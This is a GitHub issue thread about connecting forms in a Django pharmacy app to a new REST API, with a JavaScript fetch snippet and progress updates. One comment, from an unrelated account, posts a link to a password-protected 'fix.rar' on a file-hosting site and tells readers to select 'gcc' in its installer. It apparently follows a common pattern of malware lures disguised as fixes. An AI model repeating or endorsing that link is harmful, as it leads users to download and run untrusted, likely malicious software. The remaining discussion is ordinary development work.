### ISSUE TITLE
Forms need relevant logic attached to them using new api approach

### ISSUE THREAD

**Issue by Khumbolawo** [Victor-M16/Smart-Pharmacist#30]
Not sure I fully understand how to do it yet but I'll try. You can takeover the issue if you'd rather do it/there's a way you'd rather do it

- [x] 1. New medication form (pharmacist view)
- [x] 2. New patient form (this one seems tricky? Since it needs the user model which has a bunch of stuff in it
- [x] 3. Rendering medications on pharmacist view as an inventory table or something
- [x] 4. Rendering prescriptions specific to the doctor view that created them

**Comment by youngerwarrior** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Victor-M16** [comment]
Not sure I fully understand how to do it yet but I'll try. You can takeover the issue if you'd rather do it/there's a way you'd rather do it

1. New medication form (pharmacist view): You can do this one
2. New patient form (this one seems tricky? Since it needs the user model which has a bunch of stuff in it: I will do this one
3. Rendering medications on pharmacist view as an inventory table or something: GET request to "api/medications"
4. Rendering prescriptions specific to the doctor view that created them: GET request to "api/prescriptions" but the viewset's `queryset` value should be filtered according to `request.user.id` or similar

**Comment by Khumbolawo** [comment]
![image](https://github.com/user-attachments/assets/9e4906a1-b8f8-4d17-9677-af88f3f32d2f)
Stuck here. Dont know if the issue is in the APIs or my form code. LLMs don't seem to know either, been trying for 3 hours now.

The javascript im using for the post request is below

``` javascript
<script>
  document
    .getElementById("medication-form")
    .addEventListener("submit", function (event) {
      event.preventDefault();
      const formData = new FormData(document.getElementById("medication-form"));

      // Move the fetch call inside the function
      fetch("/api/medications/", {
        method: "POST",
        headers: {
          "Content-Type": "application/json",
          "X-CSRFToken": "{{ csrf_token }}",
        },
        body: JSON.stringify({
          name: formData.get("medication"),
          description: formData.get("description"),
        }),
      })
        .then((response) => response.json())
        .then((data) => {
          console.log("medication created:", data);
        })
        .catch((error) => {
          console.error("Error creating medication:", error);
        });
    });
</script>

```

Data seems like its being parsed correctly into json:
![image](https://github.com/user-attachments/assets/57c33230-ee40-4b30-b352-a2f4676547f1)

I double checked that the fields match with the model.

**Comment by Khumbolawo** [comment]
![Screenshot 2024-08-27 005806](https://github.com/user-attachments/assets/7ff311a9-8be0-4228-bb7f-8f74614978ce)

![Screenshot 2024-08-27 005751](https://github.com/user-attachments/assets/feadac68-a588-4903-a5f6-53380f592250)

Thinking these might be useful. Permission issues?

**Comment by Khumbolawo** [comment]
1. New medication form done

Victor fixed the issue. Some leftover code in the medication viewsets from an earlier experiment was preventing the form from posting to the API successfully

**Comment by Khumbolawo** [comment]
3. Rendering medications on pharmacist view, done.

Table design has changed a little bit. Looks more modern methinks. Will update the table styles on the other pages too
